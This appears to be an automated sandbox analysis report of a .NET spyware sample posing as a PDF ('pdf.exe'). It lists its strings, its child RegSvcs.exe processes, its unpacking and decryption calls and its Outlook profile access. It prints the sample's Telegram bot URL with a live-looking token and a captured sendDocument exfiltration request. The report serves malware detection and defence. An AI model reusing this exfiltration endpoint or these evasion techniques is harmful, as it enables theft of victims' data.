                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286315824.0000000005CFA000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286249935.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.com5v
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.287143704.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.tiro.comic
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.net(
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netD
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.284026858.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284090445.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284056869.0000000005CEB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.284128821.0000000005CEB000.00000004.00000001.sdmpString found in binary or memory: http://www.typography.netiv
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.292550293.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.de
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.292495353.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dec
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dedc
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.290669314.0000000005CFB000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.290625115.0000000005CF9000.00000004.00000001.sdmpString found in binary or memory: http://www.urwpp.dem
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320450047.0000000006EE2000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286803625.0000000005CEF000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                      Source: 20220114080343434.pdf.exe, 00000000.00000003.286749544.0000000005CEF000.00000004.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cne&
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%$
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org%GETMozilla/5.0
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocumentdocument-----
                      Source: RegSvcs.exe, 00000008.00000002.557247473.00000000036FD000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org4
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmp, 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308590348.0000000000402000.00000040.00000001.sdmp, RegSvcs.exe, 00000008.00000000.308204032.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                      Source: RegSvcs.exe, 00000008.00000002.557166211.00000000036A7000.00000004.00000001.sdmpString found in binary or memory: https://xXcVm5kmD6Gyza.org
                      Source: RegSvcs.exe, 00000008.00000002.556475809.00000000033A1000.00000004.00000001.sdmpString found in binary or memory: https://xXcVm5kmD6Gyza.org(
                      Source: unknownHTTP traffic detected: POST /bot2122434962:AAFqluKwJfwmfN8BZ9xq0IjlIijJbDmwbKs/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8d9d77ee3312256Host: api.telegram.orgContent-Length: 1009Expect: 100-continueConnection: Keep-Alive
                      Source: unknownDNS traffic detected: queries for: api.telegram.org
                      Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.3:49830 version: TLS 1.2
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311203434.0000000000F48000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

                      System Summary:

                      barindex
                      Initial sample is a PE file and has a suspicious nameShow sources
                      Source: initial sampleStatic PE information: Filename: 20220114080343434.pdf.exe
                      .NET source code contains very large array initializationsShow sources
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.3.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 8.0.RegSvcs.exe.400000.4.unpack, u003cPrivateImplementationDetailsu003eu007b22245F62u002d6469u002d4896u002dA148u002d964494E27445u007d/CEADE11Au002d8F8Eu002d496Bu002dAC6Fu002d1775F318E4EC.csLarge array initialization: .cctor: array initializer size 12026
                      Source: 20220114080343434.pdf.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138CA140_2_0138CA14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138EE700_2_0138EE70
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_0138EE600_2_0138EE60
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074480E00_2_074480E0
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07440B140_2_07440B14
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074400400_2_07440040
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074400350_2_07440035
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_074480D00_2_074480D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F1FE08_2_015F1FE0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F26188_2_015F2618
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FF2F58_2_015FF2F5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FD2E08_2_015FD2E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FB1188_2_015FB118
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F9DB88_2_015F9DB8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015FE0008_2_015FE000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F65208_2_017F6520
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F7D908_2_017F7D90
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F93B88_2_017F93B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F43A88_2_017F43A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F16208_2_017F1620
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F76E08_2_017F76E0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1DC88_2_017F1DC8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FA86E8_2_017FA86E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017FA8D08_2_017FA8D0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F1E688_2_017F1E68
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_058247A08_2_058247A0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_058247908_2_05824790
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_058247738_2_05824773
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0582D6608_2_0582D660
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_05823CEF8_2_05823CEF
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilename vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.312248426.0000000002D81000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.320650494.00000000072C0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313357191.0000000003D89000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000000.280755361.0000000000872000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameXsRnamTkSyDlCuAFAppJMGlseY.exe4 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.313963303.0000000003EDC000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameUI.dllF vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exe, 00000000.00000002.311203434.0000000000F48000.00000004.00000020.sdmpBinary or memory string: OriginalFilenameclr.dllT vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeBinary or memory string: OriginalFilenameWellKnownSidTy.exe0 vs 20220114080343434.pdf.exe
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: 20220114080343434.pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\20220114080343434.pdf.exe "C:\Users\user\Desktop\20220114080343434.pdf.exe"
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\20220114080343434.pdf.exe.logJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@5/1@1/2
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeMutant created: \Sessions\1\BaseNamedObjects\EwKDsJegaFtJBPaA
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.1.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.2.RegSvcs.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 8.0.RegSvcs.exe.400000.2.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: 20220114080343434.pdf.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                      Source: 20220114080343434.pdf.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: WellKnownSidTy.pdb source: 20220114080343434.pdf.exe

                      Data Obfuscation:

                      barindex
                      .NET source code contains potential unpackerShow sources
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.0.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 0.2.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: Kp System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: 20220114080343434.pdf.exe, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 0.0.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: 0.2.20220114080343434.pdf.exe.870000.0.unpack, dO/Q4.cs.Net Code: LateBinding.LateCall(V_5, null, "Invoke", new object[] { null, V_6 }, null, null)
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeCode function: 0_2_07441B5D push edi; retf 0_2_07441B66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F1F32 push es; ret 8_2_015F1F40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_015F7A37 push edi; retn 0000h8_2_015F7A39
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_017F60F0 push es; ret 8_2_017F6100
                      Source: initial sampleStatic PE information: section name: .text entropy: 7.23442041847

                      Hooking and other Techniques for Hiding and Protection:

                      barindex
                      Uses an obfuscated file name to hide its real file extension (double extension)Show sources
                      Source: Possible double extension: pdf.exeStatic PE information: 20220114080343434.pdf.exe
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\20220114080343434.pdf.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
